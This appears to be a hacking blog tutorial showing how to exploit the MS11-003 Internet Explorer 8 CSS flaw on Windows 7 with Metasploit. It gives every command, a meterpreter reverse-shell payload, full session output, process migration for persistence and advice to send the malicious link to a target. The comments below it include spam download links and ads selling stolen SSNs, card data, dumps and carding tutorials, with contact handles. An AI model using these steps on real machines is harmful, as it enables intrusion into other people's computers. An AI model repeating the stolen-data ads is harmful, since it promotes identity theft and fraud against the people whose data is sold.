In this tutorial, we will exploit "Internet Explorer CSS recursive call memory corrruption" vulnerability in Internet Explorer 8 in Windows 7 Service Pack 1 (unpatched) using Metasploit in Kali Linux and get a remote shell on the Windows 7 machine.
We have the following configuration: Windows 7 IP Address: 192.168.122.10
Kali Linux IP Address: 192.168.122.115
Perform the following steps on the Kali Linux Machine
1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.
root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
2) Start metasploit console.
root@kali:~# msfconsole
msf >
3) Select exploit.
msf > use exploit/windows/browser/ms11_003_ie_css_import
4) Select payload.
msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
5) View options.
msf exploit(ms11_003_ie_css_import) > show options
Module options (exploit/windows/browser/ms11_003_ie_css_import):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE true no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
6) Set options
msf exploit(ms11_003_ie_css_import) > set URIPATH /
URIPATH => /
msf exploit(ms11_003_ie_css_import) > set LHOST 192.168.122.115
LHOST => 192.168.122.115
7) Execute the exploit.
msf exploit(ms11_003_ie_css_import) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.122.115:4444
msf exploit(ms11_003_ie_css_import) > [*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.122.115:8080/
[*] Server started.
8) User clicks on the malicious URL. As we can see, a link has been generated as a result of the exploit command. This is the malicious link http://192.168.122.115:8080/ that we will have to send to our target, so that it can exploit their browser.
When the user clicks on the malicious link, the browser will try to load the page, but nothing will be displayed. But you will get a remote shell on your msfconsole, as shown below.
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending redirect
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/iPKMV.html"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending HTML
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/favicon.ico"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] Session ID 1 (192.168.122.115:4444 -> 192.168.122.10:49219) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2744)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3376
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/favicon.ico"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS
[+] Successfully migrated to process
[*] Session ID 2 (192.168.122.115:4444 -> 192.168.122.10:49221) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3404)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3532
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[+] Successfully migrated to process
[*] Session ID 3 (192.168.122.115:4444 -> 192.168.122.10:49224) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3664)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3808
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[+] Successfully migrated to process
[*] Session ID 4 (192.168.122.115:4444 -> 192.168.122.10:49226) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3848)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process
As we can see above, the InitialAutoRunScript executes a migrate -f command which migrates the payload from iexplorer.exe to notepad.exe. This step is essential for a persistent connectivity. Even if the user closes the browser, still the conection will be alive as we have migrated to another process.
9) View the sessions.
msf exploit(ms11_003_ie_css_import) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 shabbir-PC\ali @ SHABBIR-PC 192.168.122.115:4444 -> 192.168.122.10:49219 (192.168.122.10)
2 meterpreter x86/win32 shabbir-PC\ali @ SHABBIR-PC 192.168.122.115:4444 -> 192.168.122.10:49221 (192.168.122.10)
3 meterpreter x86/win32 shabbir-PC\ali @ SHABBIR-PC 192.168.122.115:4444 -> 192.168.122.10:49224 (192.168.122.10)
4 meterpreter x86/win32 shabbir-PC\ali @ SHABBIR-PC 192.168.122.115:4444 -> 192.168.122.10:49226 (192.168.122.10)
10) Connect to the remote machine.
msf exploit(ms11_003_ie_css_import) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : SHABBIR-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > getuid
Server username: shabbir-PC\ali
meterpreter > shell
Process 2704 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\ali\Desktop>
yeah ! great work
ReplyDeleteLinux And Hacking Guide: Hack Windows 7 By Using Kali Linux >>>>> Download Now
Delete>>>>> Download Full
Linux And Hacking Guide: Hack Windows 7 By Using Kali Linux >>>>> Download LINK
>>>>> Download Now
Linux And Hacking Guide: Hack Windows 7 By Using Kali Linux >>>>> Download Full
>>>>> Download LINK W0
wow ! great work
ReplyDeleteI sent that link through mail
ReplyDeleteafter switching to my windows i opened browser and made click on that link
new tab open's and showing
The site can't be reached error
What could be a problem
is there a cv for this
ReplyDeleteHey Guys !
ReplyDeleteUSA Fresh & Verified SSN Leads along with Driving License/ ID Number, AVAILABLE with 99.9% connectivity
All Leads have genuine & valid information.
**DETAILS IN LEADS**
First Name | Last Name | SSN | Dob | Driving License Number | Address | City | State | Zip | Phone Number | Account Number | Payday | Bank Name | Employee Details | IP Address
*Price for SSN lead $2
*You can ask for sample before any deal
*If anyone buy in bulk, we can negotiate
*Sampling is just for serious buyers
==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
->$5 PER EACH
->Hope for the long term Business
->Interested buyers will be welcome
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
Hi Guy's
ReplyDeleteFresh & valid spammed USA SSN+Dob Leads with DL available in bulk.
>>1$ each SSN+DOB
>>3$ each with SSN+DOB+DL
>>5$ each for premium fullz (700+ credit score with replacement guarantee)
Prices are negotiable in bulk order
Serious buyer contact me no time wasters please
Bulk order will be preferable
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
OTHER STUFF YOU CAN GET
SSN+DOB Fullz
CC's with CVV's (vbv & non-vbv)
USA Photo ID'S (Front & back)
All type of tutorials available
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)
SMTP Linux Root
DUMPS with pins track 1 and 2
WU & Bank transfers
Socks, rdp's, vpn
Php mailer
Sql injector
Bitcoin cracker
Server I.P's
HQ Emails with passwords
All types of tools & tutorials.. & much more
Looking for long term business
For trust full vendor, feel free to contact
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
Linux And Hacking Guide: Hack Windows 7 By Using Kali Linux >>>>> Download Now
ReplyDelete>>>>> Download Full
Linux And Hacking Guide: Hack Windows 7 By Using Kali Linux >>>>> Download LINK
>>>>> Download Now
Linux And Hacking Guide: Hack Windows 7 By Using Kali Linux >>>>> Download Full
>>>>> Download LINK gB